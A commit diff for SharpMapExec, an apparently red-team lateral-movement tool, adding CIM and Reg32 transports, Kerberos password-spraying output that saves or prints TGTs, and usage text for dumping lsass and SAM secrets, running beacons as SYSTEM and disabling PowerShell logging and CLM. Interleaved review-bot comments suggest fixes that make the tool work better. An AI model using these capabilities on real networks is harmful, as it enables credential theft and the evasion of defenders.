  • Cim & Reg32 providers added, code cleanup, added stdin pipe for /system and /delegwalk

  • cube0x0 committed 3 years ago
    c3a8e0ba
    1 parent 217d1c54
  • .vs/SharpMapExec/v16/.suo
    Binary file.
  • ■ ■ ■ ■ ■ ■
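--- a/SharpMapExec/Args/CommandCollection.cs
+++ b/SharpMapExec/Args/CommandCollection.cs
@@ -20,8 +20,11 @@
  _availableCommands.Add(kerbspray.CommandName, () => new kerbspray());
  _availableCommands.Add(kerberosSmb.CommandName, () => new kerberosSmb());
  _availableCommands.Add(kerberosWinrm.CommandName, () => new kerberosWinrm());
+ _availableCommands.Add(kerberosReg32.CommandName, () => new kerberosReg32());
  _availableCommands.Add(NtlmWinrm.CommandName, () => new NtlmWinrm());
  _availableCommands.Add(NtlmSmb.CommandName, () => new NtlmSmb());
+ _availableCommands.Add(NtlmCim.CommandName, () => new NtlmCim());
+ _availableCommands.Add(NtlmReg32.CommandName, () => new NtlmReg32());
  }
 
  public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)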
  • ■ ■ ■ ■ ■
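--- a/SharpMapExec/Args/Info.cs
+++ b/SharpMapExec/Args/Info.cs
@@ -8,25 +8,48 @@
  {
  Console.WriteLine("\r\n SharpMapExec.exe\r\n usage:");
 
- //smb
+ //Cim
+ Console.WriteLine("\r\n --- Cim ---");
+ Console.WriteLine(@" SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET");
+ Console.WriteLine("\n Available Cim modules");
+ Console.WriteLine(@" /m:enable_winrm (Runs Enable-PSRemoting -Force)");
+ Console.WriteLine(@" /m:disable_winrm (Runs Disable-PSRemoting -Force)");
+ Console.WriteLine(@" /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)");
+ Console.WriteLine(@" /m:disable_pslogging (Modify registry to disable PowerShell Logging)");
+ Console.WriteLine(@" /m:check_pslockdown (Check __PSLockdownPolicy registry)");
+ Console.WriteLine(@" /m:check_pslogging (Check PowerShell Logging registry)");
+
+ //Reg32
+ Console.WriteLine("\r\n --- Reg32 ---");
+ Console.WriteLine(@" SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET");
+ Console.WriteLine(@" SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET");
+ Console.WriteLine("\n Reg32 modules");
+ Console.WriteLine(@" /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)");
+ Console.WriteLine(@" /m:disable_pslogging (Modify registry to disable PowerShell Logging)");
+ Console.WriteLine(@" /m:check_pslockdown (Check __PSLockdownPolicy registry)");
+ Console.WriteLine(@" /m:check_pslogging (Check PowerShell Logging registry)");
+
+ //Smb
  Console.WriteLine("\r\n --- Smb ---");
  Console.WriteLine(@" SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET");
  Console.WriteLine(@" SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET");
- Console.WriteLine("\n Available Smb modules");
- Console.WriteLine(@" /m:shares");
+ Console.WriteLine("\n Smb modules");
+ Console.WriteLine(@" /m:shares (Scan for accessible Smb shares)");
 
  //WinRm
  Console.WriteLine("\r\n --- WinRm ---");
  Console.WriteLine(@" SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET ");
  Console.WriteLine(@" SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET");
- Console.WriteLine("\n Available WinRm modules");
+ Console.WriteLine("\n WinRm modules");
  Console.WriteLine(@" /m:exec /a:whoami (Invoke-Command)");
  Console.WriteLine(@" /m:exec /a:C:\beacon.exe /system (Invoke-Command as System)");
- Console.WriteLine(@" /m:comsvcs (Dump Lsass Process)");
+ Console.WriteLine(@" /m:comsvcs (Dump & parse lsass)");
  Console.WriteLine(@" /m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)");
- Console.WriteLine(@" /m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)");
- Console.WriteLine(@" /m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)");
- Console.WriteLine(@" /m:download /path:C:\file /destination:file (Download File from Host)");
+ Console.WriteLine(@" /m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)");
+ Console.WriteLine(@" /m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)");
+ Console.WriteLine(@" /m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)");
+ Console.WriteLine(@" /m:download /path:C:\file /destination:file (Download file from host)");
+ Console.WriteLine(@" /m:upload /path:C:\file /destination:file (Upload file to host)");
 
  //domain
  Console.WriteLine("\r\n --- Domain ---");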
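Review bot: The new Cim and Reg32 module lists describe `disable_pslockdown` and `disable_pslogging` as registry modifications but offer only `check_` counterparts, so nothing in the usage text tells an operator that the change persists or how the original values are put back after an authorised assessment. A host left with PowerShell logging off and CLM disabled is a lasting reduction in its defensive posture, so both descriptions should say so, e.g. by appending `- persistent; record the prior value and restore it afterwards`. The Cim heading also still reads `Available Cim modules` while this same change drops `Available` from the Smb and WinRm headings; `Cim modules` would be consistent. The enclosing method starts and ends outside the visible lines.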
  • ■ ■ ■ ■ ■
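--- a/SharpMapExec/Commands/KerberosSpray.cs
+++ b/SharpMapExec/Commands/KerberosSpray.cs
@@ -36,6 +36,7 @@
 
  public void Execute(Dictionary<string, string> arguments)
  {
+ Console.WriteLine("\r\n[*] Action: Perform Kerberos Brute Force\r\n");
  try
  {
  this.ParseArguments(arguments);
@@ -137,6 +138,7 @@
 
  this.credPassword = arguments["/credpassword"];
  }
+
  }
 
  private void ParsePasswords(Dictionary<string, string> arguments)
@@ -223,6 +225,7 @@
 
  private string[] DomainUsernames()
  {
+
  string domainController = this.DomainController();
  string bindPath = this.BindPath(domainController);
  DirectoryEntry directoryObject = new DirectoryEntry(bindPath);
@@ -241,6 +244,7 @@
 
  Console.WriteLine("[*] Using alternate creds : {0}\r\n", userDomain);
  }
+
 
  DirectorySearcher userSearcher = new DirectorySearcher(directoryObject);
  userSearcher.Filter = "(samAccountType=805306368)";
@@ -282,6 +286,7 @@
  {
  string domainController = null;
 
+
  if (String.IsNullOrEmpty(this.dc))
  {
  domainController = Networking.GetDCName();
@@ -324,10 +329,13 @@
  return pc.ValidateCredentials(this.credUser, this.credPassword);
  }
  }
+
  }
+
 
  public class BruteforceConsoleReporter : IBruteforcerReporter
  {
+
  private uint verbose;
  private string passwordsOutfile;
  private bool saveTicket;
@@ -340,13 +348,18 @@
  this.saveTicket = saveTicket;
  }
 
- public void ReportValidPassword(string domain, string username, string password, byte[] ticket)
+ public void ReportValidPassword(string domain, string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE)
  {
- Console.WriteLine("[+] STUPENDOUS => {0}:{1}", username, password);
  this.WriteUserPasswordToFile(username, password);
- string ticketFilename = username + ".kirbi";
- File.WriteAllBytes(ticketFilename, ticket);
- Console.WriteLine("[*] Saved TGT into {0}", ticketFilename);
+ if (ticket != null)
+ {
+ Console.WriteLine("[+] STUPENDOUS => {0}:{1}", username, password);
+ this.HandleTicket(username, ticket);
+ }
+ else
+ {
+ Console.WriteLine("[+] UNLUCKY => {0}:{1} ({2})", username, password, err);
+ }
  }
 
  public void ReportValidUser(string domain, string username)
@@ -376,6 +389,7 @@
  krbError.error_code, (Interop.KERBEROS_ERROR)krbError.error_code);
  }
 
+
  private void WriteUserPasswordToFile(string username, string password)
  {
  if (String.IsNullOrEmpty(this.passwordsOutfile))
@@ -397,5 +411,32 @@
  }
  }
  }
+
+ private void HandleTicket(string username, byte[] ticket)
+ {
+ if (this.saveTicket)
+ {
+ string ticketFilename = username + ".kirbi";
+ File.WriteAllBytes(ticketFilename, ticket);
+ Console.WriteLine("[*] Saved TGT into {0}", ticketFilename);
+ }
+ else
+ {
+ this.PrintTicketBase64(username, ticket);
+ }
+ }
+
+ private void PrintTicketBase64(string ticketname, byte[] ticket)
+ {
+ string ticketB64 = Convert.ToBase64String(ticket);
+
+ Console.WriteLine("[*] base64({0}.kirbi):\r\n", ticketname);
+
+ // display in columns of 80 chararacters
+ Console.WriteLine(" {0}", ticketB64);
+
+ Console.WriteLine("\r\n", ticketname);
+ }
+
  }
 }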
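Review bot: In `PrintTicketBase64` the comment `// display in columns of 80 chararacters` does not match the code, which writes the whole base64 string on one line, and `Console.WriteLine("\r\n", ticketname)` passes an argument the format string never uses. Either wrap the output as the comment says or reword it to `// printed as a single line`, and reduce the last call to `Console.WriteLine("\r\n");`. Separately, in `ReportValidPassword` the call to `WriteUserPasswordToFile` runs before the `ticket != null` test, so a credential pair that came back with a KDC error appears to be recorded without the `err` value the console line shows; if that is intended, a short comment saying so would help. Most of `WriteUserPasswordToFile` lies outside the visible hunks, so that second point is inferred.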
  • ■ ■ ■ ■ ■ ■
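--- a/SharpMapExec/Commands/NtlmCim.cs
+++ b/SharpMapExec/Commands/NtlmCim.cs
@@ -0,0 +1,151 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using static SharpMapExec.Helpers.SecurityContext;
+
+namespace SharpMapExec.Commands
+{
+ public class NtlmCim : ICommand
+ {
+ public static string CommandName => "ntlmcim";
+
+ public void Execute(Dictionary<string, string> arguments)
+ {
+ string[] user;
+ string domain = "";
+ string path = "";
+ string destination = "";
+ string[] computernames;
+ var hash = new NTHash();
+ var password = new ClearText();
+ string module = "";
+ string moduleargument = "";
+ List<string> flags = new List<string>();
+
+ if (arguments.ContainsKey("/module"))
+ {
+ module = arguments["/module"];
+ }
+ if (arguments.ContainsKey("/m"))
+ {
+ module = arguments["/m"];
+ }
+ if (arguments.ContainsKey("/impersonate") || arguments.ContainsKey("/imprs"))
+ {
+ flags.Add("impersonate");
+ }
+
+
+ //
+ if (arguments.ContainsKey("/domain"))
+ {
+ domain = arguments["/domain"];
+ }
+ else
+ {
+ domain = ".";
+ }
+
+ if (arguments.ContainsKey("/user"))
+ {
+ if (File.Exists(arguments["/user"]))
+ {
+ user = File.ReadAllLines(arguments["/user"]);
+ }
+ else
+ {
+ string[] parts = arguments["/user"].Split('\\');
+ if (parts.Length == 2)
+ {
+ domain = parts[0];
+ user = parts[1].Split(',');
+ }
+ else
+ {
+ user = arguments["/user"].Split(',');
+ }
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /user must be supplied!");
+ return;
+ }
+
+ if (arguments.ContainsKey("/computername"))
+ {
+ if (File.Exists(arguments["/computername"]))
+ {
+ computernames = File.ReadAllLines(arguments["/computername"]);
+ }
+ else
+ {
+ computernames = arguments["/computername"].Split(',');
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /computername must be supplied!");
+ return;
+ }
+
+ if (arguments.ContainsKey("/password"))
+ {
+ if (File.Exists(arguments["/password"]))
+ {
+ password.Cleartext = File.ReadAllLines(arguments["/password"]);
+ }
+ else
+ {
+ password.Cleartext = arguments["/password"].Split(',');
+ }
+ }
+ else if (arguments.ContainsKey("/ntlm"))
+ {
+ if (File.Exists(arguments["/ntlm"]))
+ {
+ hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
+ }
+ else
+ {
+ hash.Nthash = arguments["/ntlm"].Split(',');
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /password or /ntlm must be supplied");
+ return;
+ }
+ if (module.Contains("exec") && moduleargument.Length == 0)
+ {
+ Console.WriteLine("[-] Missing exec argument");
+ return;
+ }
+ if (module.Contains("assembly") && !File.Exists(path))
+ {
+ Console.WriteLine("[-] Missing assembly path");
+ return;
+ }
+ if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
+ if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
+
+ if (password.Cleartext != null)
+ {
+ Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "cim");
+ }
+ else
+ {
+ Console.WriteLine("[-] Need clear-text password for cim");
+ return;
+ }
+ }
+ }
+}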
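Review bot: `path`, `destination` and `moduleargument` are initialised to `""` and never read from `arguments` in `Execute`, so the four `module.Contains(...)` checks can only reject: any module name containing `exec`, `assembly`, `download` or `upload` ends in an error message whatever the operator supplied. The Cim modules listed in Info.cs need none of these values, so the checks look like copy-paste residue and can be removed; the same block is added to NtlmReg32.cs. The `/ntlm` branch has the mirror-image problem: the hash is parsed (a file may be read) and only at the very end rejected with `[-] Need clear-text password for cim`, while the earlier message still advertises `/password or /ntlm`. Rejecting it where it is parsed, with `Console.WriteLine("[-] cim requires /password; /ntlm is not supported"); return;`, keeps the failure next to its cause and makes the unused `hash` local unnecessary.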
  • ■ ■ ■ ■ ■ ■
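--- a/SharpMapExec/Commands/NtlmReg32.cs
+++ b/SharpMapExec/Commands/NtlmReg32.cs
@@ -0,0 +1,145 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using static SharpMapExec.Helpers.SecurityContext;
+
+namespace SharpMapExec.Commands
+{
+ public class NtlmReg32 : ICommand
+ {
+ public static string CommandName => "ntlmreg32";
+
+ public void Execute(Dictionary<string, string> arguments)
+ {
+ string[] user;
+ string domain = "";
+ string path = "";
+ string destination = "";
+ string[] computernames;
+ var hash = new NTHash();
+ var password = new ClearText();
+ string module = "";
+ string moduleargument = "";
+ List<string> flags = new List<string>();
+
+ if (arguments.ContainsKey("/module"))
+ {
+ module = arguments["/module"];
+ }
+ if (arguments.ContainsKey("/m"))
+ {
+ module = arguments["/m"];
+ }
+
+ //
+ if (arguments.ContainsKey("/domain"))
+ {
+ domain = arguments["/domain"];
+ }
+ else
+ {
+ domain = ".";
+ }
+
+ if (arguments.ContainsKey("/user"))
+ {
+ if (File.Exists(arguments["/user"]))
+ {
+ user = File.ReadAllLines(arguments["/user"]);
+ }
+ else
+ {
+ string[] parts = arguments["/user"].Split('\\');
+ if (parts.Length == 2)
+ {
+ domain = parts[0];
+ user = parts[1].Split(',');
+ }
+ else
+ {
+ user = arguments["/user"].Split(',');
+ }
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /user must be supplied!");
+ return;
+ }
+
+ if (arguments.ContainsKey("/computername"))
+ {
+ if (File.Exists(arguments["/computername"]))
+ {
+ computernames = File.ReadAllLines(arguments["/computername"]);
+ }
+ else
+ {
+ computernames = arguments["/computername"].Split(',');
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /computername must be supplied!");
+ return;
+ }
+
+ if (arguments.ContainsKey("/password"))
+ {
+ if (File.Exists(arguments["/password"]))
+ {
+ password.Cleartext = File.ReadAllLines(arguments["/password"]);
+ }
+ else
+ {
+ password.Cleartext = arguments["/password"].Split(',');
+ }
+ }
+ else if (arguments.ContainsKey("/ntlm"))
+ {
+ if (File.Exists(arguments["/ntlm"]))
+ {
+ hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
+ }
+ else
+ {
+ hash.Nthash = arguments["/ntlm"].Split(',');
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /password or /ntlm must be supplied");
+ return;
+ }
+ if (module.Contains("exec") && moduleargument.Length == 0)
+ {
+ Console.WriteLine("[-] Missing exec argument");
+ return;
+ }
+ if (module.Contains("assembly") && !File.Exists(path))
+ {
+ Console.WriteLine("[-] Missing assembly path");
+ return;
+ }
+ if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
+ if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
+
+ if (password.Cleartext != null)
+ {
+ Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "reg32");
+ }
+ else
+ {
+ Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, path, destination, flags, "reg32");
+ }
+ }
+ }
+}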
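Review bot: A `DOMAIN\user` prefix in `/user` silently overrides an explicit `/domain` here, because `/domain` is read first and `domain = parts[0]` runs afterwards, whereas kerberosReg32.cs in this same commit reads `/user` first and lets `/domain` win. Authenticating against a different domain than the one the operator named produces failed logons against the wrong accounts, so the precedence should be identical in both commands and stated once, e.g. `// an explicit /domain takes precedence over a DOMAIN\ prefix in /user`. NtlmCim.cs uses the same ordering as this file. Each credential argument is also classified by `File.Exists` on the raw value, so a password or hash that happens to match a file name in the working directory is replaced by that file's lines without any message; a log line naming the file that was read would make this visible.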
  • ■ ■ ■ ■ ■ ■
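--- a/SharpMapExec/Commands/NtlmSmb.cs
+++ b/SharpMapExec/Commands/NtlmSmb.cs
@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.IO;
 using static SharpMapExec.Helpers.SecurityContext;
-using static SharpMapExec.Lib.ntlmsmb;
 
 namespace SharpMapExec.Commands
 {
@@ -38,6 +37,8 @@
  moduleargument = arguments["/argument"];
  }
 
+
+ //
  if (arguments.ContainsKey("/domain"))
  {
  domain = arguments["/domain"];
@@ -119,11 +120,11 @@
  }
  if (password.Cleartext != null)
  {
- NtlmSmb(user, domain, password, computernames, module, moduleargument);
+ Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, "", "", flags, "smb");
  }
  else
  {
- NtlmSmb(user, domain, hash, computernames, module, moduleargument);
+ Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, "", "", flags, "smb");
  }
  }
  }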
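Review bot: The transport is now selected by a bare string literal (`"smb"` here; `"winrm"`, `"cim"` and `"reg32"` at the other call sites this commit touches, including kerberosSmb.cs and kerberosWinrm.cs), so a typo at any call site compiles and is caught, if at all, only inside the callee at run time. An enum or shared constants, e.g. `Lib.ntlm.Ntlm(..., flags, Protocol.Smb)`, would let the compiler check the set of supported transports; `Protocol` is a suggested name, not an existing type. The two `""` arguments stand in for `path` and `destination`, and a comment such as `// smb modules take no path/destination` would explain them. Both `flags` and the body of `Lib.ntlm.Ntlm` are outside the visible hunks, so how an unrecognised string is handled cannot be seen from here.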
  • ■ ■ ■ ■ ■
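--- a/SharpMapExec/Commands/NtlmWinrm.cs
+++ b/SharpMapExec/Commands/NtlmWinrm.cs
@@ -2,7 +2,6 @@
 using System.Collections.Generic;
 using System.IO;
 using static SharpMapExec.Helpers.SecurityContext;
-using static SharpMapExec.Lib.ntlmwinrm;
 
 namespace SharpMapExec.Commands
 {
@@ -63,7 +62,29 @@
  {
  flags.Add("delegwalk");
  }
+ if (module.Contains("exec") && moduleargument.Length == 0)
+ {
+ Console.WriteLine("[-] Missing exec argument");
+ return;
+ }
+ if (module.Contains("assembly") && !File.Exists(path))
+ {
+ Console.WriteLine("[-] Missing assembly path");
+ return;
+ }
+ if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
+ if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
 
+
+ //
  if (arguments.ContainsKey("/domain"))
  {
  domain = arguments["/domain"];
@@ -143,13 +164,15 @@
  Console.WriteLine("[-] /password or /ntlm must be supplied");
  return;
  }
+
+
  if (password.Cleartext != null)
  {
- NtlmWinRm(user, domain, password, computernames, module, moduleargument, path, destination, flags);
+ Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "winrm");
  }
  else
  {
- NtlmWinRm(user, domain, hash, computernames, module, moduleargument, path, destination, flags);
+ Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, path, destination, flags, "winrm");
  }
  }
  }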
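Review bot: The new validation block tests `module.Contains("exec")`, `Contains("assembly")` and so on, which is a case-sensitive substring match: `/m:EXEC` bypasses the check, and any future module whose name merely contains one of these words triggers it. Comparing whole names, e.g. `module.Equals("exec", StringComparison.OrdinalIgnoreCase)`, states the intent. The `upload` check only requires `path` to be non-empty although `path` is presumably a local file in that case, so `File.Exists(path)` belongs there as it does for `assembly`; `[-] Missing assembly path` is also printed when a path was given but the file does not exist. The identical twenty lines are added to kerberosWinrm.cs, NtlmCim.cs and NtlmReg32.cs, so a single shared helper would keep the four copies from drifting. `Execute` starts and ends outside the visible hunks.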
  • ■ ■ ■ ■ ■ ■
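--- a/SharpMapExec/Commands/kerberosReg32.cs
+++ b/SharpMapExec/Commands/kerberosReg32.cs
@@ -0,0 +1,180 @@
+using Rubeus;
+using System;
+using System.Collections.Generic;
+using System.IO;
+
+namespace SharpMapExec.Commands
+{
+ public class kerberosReg32 : ICommand
+ {
+ public static string CommandName => "kerberosreg32";
+
+ public void Execute(Dictionary<string, string> arguments)
+ {
+ string[] users = { };
+ string domain = "";
+ string[] passwords = { };
+ string[] hashes = { };
+ string dc = "";
+ string ticket = "";
+ Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
+ string[] computernames;
+ string module = "";
+ string moduleargument = "";
+ List<string> flags = new List<string>();
+
+ if (arguments.ContainsKey("/module"))
+ {
+ module = arguments["/module"];
+ }
+ if (arguments.ContainsKey("/m"))
+ {
+ module = arguments["/m"];
+ }
+
+
+ //
+ if (arguments.ContainsKey("/user"))
+ {
+ if (File.Exists(arguments["/user"]))
+ {
+ users = File.ReadAllLines(arguments["/user"]);
+ }
+ else
+ {
+ string[] parts = arguments["/user"].Split('\\');
+ if (parts.Length == 2)
+ {
+ domain = parts[0];
+ users = parts[1].Split(',');
+ }
+ else
+ {
+ users = arguments["/user"].Split(',');
+ }
+ }
+ }
+
+ if (arguments.ContainsKey("/domain"))
+ {
+ domain = arguments["/domain"];
+ }
+ if (arguments.ContainsKey("/dc"))
+ {
+ dc = arguments["/dc"];
+ }
+ if (arguments.ContainsKey("/ticket"))
+ {
+ ticket = arguments["/ticket"];
+ }
+
+ if (arguments.ContainsKey("/computername"))
+ {
+ if (File.Exists(arguments["/computername"]))
+ {
+ computernames = File.ReadAllLines(arguments["/computername"]);
+ }
+ else
+ {
+ computernames = arguments["/computername"].Split(',');
+ }
+ }
+ else
+ {
+ Console.WriteLine("[-] /computername must be supplied!");
+ return;
+ }
+
+ if (arguments.ContainsKey("/encType"))
+ {
+ string encTypeString = encType.ToString().ToUpper();
+
+ if (encTypeString.Equals("RC4") || encTypeString.Equals("NTLM"))
+ {
+ encType = Interop.KERB_ETYPE.rc4_hmac;
+ }
+ else if (encTypeString.Equals("AES128"))
+ {
+ encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
+ }
+ else if (encTypeString.Equals("AES256") || encTypeString.Equals("AES"))
+ {
+ encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
+ }
+ else if (encTypeString.Equals("DES"))
+ {
+ encType = Interop.KERB_ETYPE.des_cbc_md5;
+ }
+ }
+ else
+ encType = Interop.KERB_ETYPE.rc4_hmac;
+
+ if (arguments.ContainsKey("/password"))
+ {
+ if (File.Exists(arguments["/password"]))
+ passwords = File.ReadAllLines(arguments["/password"]);
+ else
+ passwords = arguments["/password"].Split(',');
+ }
+ else if (arguments.ContainsKey("/des"))
+ {
+ if (File.Exists(arguments["/des"]))
+ hashes = File.ReadAllLines(arguments["/des"]);
+ else
+ hashes = arguments["/des"].Split(',');
+ encType = Interop.KERB_ETYPE.des_cbc_md5;
+ }
+ else if (arguments.ContainsKey("/rc4"))
+ {
+ if (File.Exists(arguments["/rc4"]))
+ hashes = File.ReadAllLines(arguments["/rc4"]);
+ else
+ hashes = arguments["/rc4"].Split(',');
+ encType = Interop.KERB_ETYPE.rc4_hmac;
+ }
+ else if (arguments.ContainsKey("/ntlm"))
+ {
+ if (File.Exists(arguments["/ntlm"]))
+ hashes = File.ReadAllLines(arguments["/ntlm"]);
+ else
+ hashes = arguments["/ntlm"].Split(',');
+ encType = Interop.KERB_ETYPE.rc4_hmac;
+ }
+ else if (arguments.ContainsKey("/aes128"))
+ {
+ hashes = arguments["/aes128"].Split(',');
+ encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
+ }
+ else if (arguments.ContainsKey("/aes256"))
+ {
+ hashes = arguments["/aes256"].Split(',');
+ encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
+ }
+
+ if (users.Length == 0 && String.IsNullOrEmpty(ticket))
+ {
+ Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
+ return;
+ }
+ if (String.IsNullOrEmpty(domain) && String.IsNullOrEmpty(ticket))
+ {
+ Console.WriteLine("\r\n[X] You must supply a domain!\r\n");
+ return;
+ }
+
+ if ((hashes.Length == 0 && passwords.Length == 0) && String.IsNullOrEmpty(ticket))
+ {
+ Console.WriteLine("\r\n[X] You must supply a /password , or a [/des|/rc4|/aes128|/aes256] hash!\r\n");
+ return;
+ }
+
+ if (String.IsNullOrEmpty(ticket) && (!((encType == Interop.KERB_ETYPE.des_cbc_md5) || (encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1))))
+ {
+ Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
+ return;
+ }
+
+ Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, "", "", flags, "reg32");
+ }
+ }
+}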
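Review bot: In the `/encType` branch `encTypeString` is built from `encType.ToString().ToUpper()`, that is from the variable's initial value `subkey_keymaterial` rather than from the argument, so none of the comparisons can match and `encType` is left at `subkey_keymaterial`. Combined with `/password` that value reaches the final guard and the command stops with `Only /des, /rc4, /aes128, and /aes256 are supported at this time.`; the line should read `string encTypeString = arguments["/encType"].ToUpperInvariant();`. An unrecognised value also falls through all four branches silently, so an explicit `else` that reports the bad value would be clearer than the generic message. The `/aes128` and `/aes256` branches skip the `File.Exists` handling the other hash options have; if that is deliberate a comment should say so. Whether the argument parser preserves the mixed-case key `/encType` is not visible here.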
  • ■ ■ ■ ■ ■ ■
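--- a/SharpMapExec/Commands/kerberosSmb.cs
+++ b/SharpMapExec/Commands/kerberosSmb.cs
@@ -2,7 +2,6 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
-using static SharpMapExec.Lib.kerberossmb;
 
 namespace SharpMapExec.Commands
 {
@@ -41,6 +40,8 @@
  moduleargument = arguments["/argument"];
  }
 
+
+ //
  if (arguments.ContainsKey("/user"))
  {
  if (File.Exists(arguments["/user"]))
@@ -180,7 +181,8 @@
  Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
  return;
  }
- KerberosSmb(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, flags);
+
+ Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, "", "", flags, "smb");
  }
  }
 }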
  • ■ ■ ■ ■ ■ ■
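--- a/SharpMapExec/Commands/kerberosWinrm.cs
+++ b/SharpMapExec/Commands/kerberosWinrm.cs
@@ -2,7 +2,6 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
-using static SharpMapExec.Lib.kerberoswinrm;
 
 namespace SharpMapExec.Commands
 {
@@ -66,7 +65,29 @@
  {
  flags.Add("delegwalk");
  }
+ if (module.Contains("exec") && moduleargument.Length == 0)
+ {
+ Console.WriteLine("[-] Missing exec argument");
+ return;
+ }
+ if (module.Contains("assembly") && !File.Exists(path))
+ {
+ Console.WriteLine("[-] Missing assembly path");
+ return;
+ }
+ if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
+ if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
+ {
+ Console.WriteLine("[-] Need path and destination");
+ return;
+ }
 
+
+ //
  if (arguments.ContainsKey("/user"))
  {
  if (File.Exists(arguments["/user"]))
@@ -207,7 +228,7 @@
  return;
  }
 
- KerberosWinRm(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
+ Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, "winrm");
  }
  }
 }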
  • ■ ■ ■ ■ ■ ■
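--- a/SharpMapExec/Helpers/Misc.cs
+++ b/SharpMapExec/Helpers/Misc.cs
@@ -3,6 +3,7 @@
 using System.IO.Compression;
 using System.Linq;
 using System.Net.Sockets;
+using System.Security;
 using System.Text;
 
 namespace SharpMapExec.Helpers
@@ -30,6 +31,7 @@
  return resultStream.ToArray();
  }
  }
+
  public static bool CheckHostPort(string hostname, int port, int PortScanTimeout = 2000)
  {
  using (var client = new TcpClient())
@@ -80,6 +82,16 @@
  .Where(x => x % 2 == 0)
  .Select(x => Convert.ToByte(hex.Substring(x, 2), 16))
  .ToArray();
+ }
+
+ public static SecureString CreateSecuredString(string pw)
+ {
+ SecureString secureString = new SecureString();
+ if (string.IsNullOrEmpty(pw))
+ return null;
+ foreach (char c in pw)
+ secureString.AppendChar(c);
+ return secureString;
  }
  }
 }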
